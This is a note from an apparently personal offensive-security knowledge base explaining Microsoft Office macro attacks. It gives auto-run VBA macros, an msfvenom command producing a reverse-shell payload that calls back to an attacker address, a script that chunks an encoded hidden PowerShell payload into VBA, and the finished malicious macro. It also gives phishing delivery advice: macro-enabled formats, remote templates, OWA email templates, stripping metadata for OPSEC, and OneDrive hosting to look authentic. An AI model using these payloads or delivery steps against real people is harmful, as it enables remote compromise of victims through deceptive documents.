Security Memo

Search (Ctrl+K)

SearchSearch

Recent Notes

See 1423 more sorted by tag →

Microsoft Office macro attack

created Jan 08, 2024updated May 21, 20242 min read

Microsoft Office documents can contain macros which are script snippets that normally enhance document functions, but can be used maliciously, such as launching reverse shells. Microsoft has lately relaxed the restriction on untrusted macros. See VBA for macro syntax.

Auto-run Macros

Macros will not be executed automatically, but they can be made to run automatically through AutoOpen and Document_Open.

' Executed when new document is opened
Sub AutoOpen()
  MyMacro
End Sub
 
' Executed when already-opened document is reopened
Sub Document_Open()
  MyMacro
End Sub
 
Sub MyMacro()
  CreateObject("Wscript.Shell").Run "cmd"
End Sub

Reverse Shells

See: reverse shell

Generate via msfvenom

See: msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.131 LPORT=8888 -f hta-psh

Generate from existing PowerShell payload

VBA has a 50-character limit for string literals. So use a Python script to split an existing PowerShell payload.

str = "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQ....."
 
n = 50
 
print("Sub MyMacro()")
print("    Dim Str As String")
 
for i in range(0, len(str), n):
    print("    Str = Str + " + '"' + str[i:i+n] + '"')
 
print("    Shell(Str)")
print("End Sub")

The above script produces the following VBA script:

Sub AutoOpen()
    MyMacro
End Sub
 
Sub Document_Open()
    MyMacro
End Sub
 
Sub MyMacro()
    Dim Str As String
    
    Str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZ"
    Str = Str + "QB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQB"
    ' ...
    Str = Str + "AJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAVABvAEUAbgBkACgAK"
    Str = Str + "QA="
 
    CreateObject("Wscript.Shell").Run Str
End Sub

Delivering the Macro

A macro must be saved in either a .doc file (old Word document format) or a .docm file (macro-enabled document format) as .docx cannot save macros to disk. It can also be saved to a .dotm (Word template file), and the macro will be available to any documents linked to that template as long as the .dotm file is reachable at the embedded URL.

Here are some email templates for sending within OWA.

OPSEC warning!

Make sure to remove all PII metadata from the document before delivery. To do so, go to File > Info > Check for Issues > Inspect Document{.verbatim}. After clicking Inspect{.verbatim}, click Remove All{.verbatim} next to “Document Properties and Personal Information.”

Serve file with OneDrive

Recommendation: Use services such as OneDrive to deliver the document for more authenticity.

Graph View

Sources

Backlinks